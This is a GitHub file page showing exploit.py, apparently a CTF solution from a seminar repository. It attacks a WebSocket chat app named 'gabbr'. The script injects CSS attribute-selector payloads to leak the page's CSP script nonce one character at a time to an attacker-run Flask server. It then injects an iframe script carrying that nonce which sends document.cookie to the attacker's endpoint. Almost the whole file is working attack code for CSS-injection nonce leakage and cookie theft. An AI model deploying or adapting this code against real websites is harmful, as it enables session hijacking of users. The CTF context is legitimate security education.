forked from w0y/CTF-Seminar-Presentations
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
77 lines (68 loc) · 2.5 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/env python3
from flask import Flask, request
import sys
import json
import websocket
import string
app = Flask(__name__)
URL = "http://192.168.99.1:5000"
payloads = [
'script[nonce^="%s"] ~ *',
'script[nonce^="%s"] ~ ul',
'script[nonce^="%s"] ~ div',
'script[nonce^="%s"] ~ input',
'script[nonce^="%s"] ~ nav',
'body > script[nonce^="%s"] ~ ul',
'body > script[nonce^="%s"] ~ div',
'body > script[nonce^="%s"] ~ input',
'body > script[nonce^="%s"] ~ nav',
'script[nonce^="%s"] ~ #messages',
'script[nonce^="%s"] ~ #status',
'script[nonce^="%s"] ~ #chatbox',
'script[nonce^="%s"] ~ #recaptcha',
'script[nonce^="%s"] ~ nav > a',
'script[nonce^="%s"] ~ nav > #report-link',
'script[nonce^="%s"] ~ nav > #username',
'body script[nonce^="%s"] ~ #messages',
'body script[nonce^="%s"] ~ #status',
'body script[nonce^="%s"] ~ #chatbox',
'body script[nonce^="%s"] ~ #recaptcha',
'body script[nonce^="%s"] ~ nav > a',
'body script[nonce^="%s"] ~ nav > #report-link',
'body script[nonce^="%s"] ~ nav > #username',
'body script[nonce^="%s"] ~ nav > [href="/"]',
'body script[nonce^="%s"] ~ nav > [href="#"]',
]
def exploit(nonce, url):
x = """<img src='https://regmedia.co.uk/2015/02/06/cookie_monster.jpg'/><iframe srcdoc="<script nonce=%s>var x = document.createElement('img'); x.src = '%s/res?c=' + document.cookie;</script>"></iframe>""" % (nonce, url)
msg = {"username" : "aaa", "type": "gabbr-message", "content": x}
socket.send(json.dumps(msg))
def generate_style(c, url):
style = "<style>"
for x in "abcdef" + string.digits:
style = style + ((payloads[len(c)] + '{ background:url("%s/?match=%s") } ') % (c + x, url, c + x))
style = style + "</style>"
return style
@app.route('/')
def handler():
match = request.args.get('match')
print(match)
if len(match) == 24:
exploit(match, URL)
else:
send_req(match)
return "a"
@app.route('/res')
def res():
match = request.args.get('c')
print(match)
return "a"
def send_req(match):
msg = {"username" : "aaa", "type": "gabbr-message", "content": generate_style(match, URL)}
socket.send(json.dumps(msg))
if __name__ == '__main__':
uri = "ws://192.168.99.100:8080/" + sys.argv[1]
socket = websocket.WebSocket()
socket.connect(uri)
print(generate_style("", URL))
app.run(host="0.0.0.0")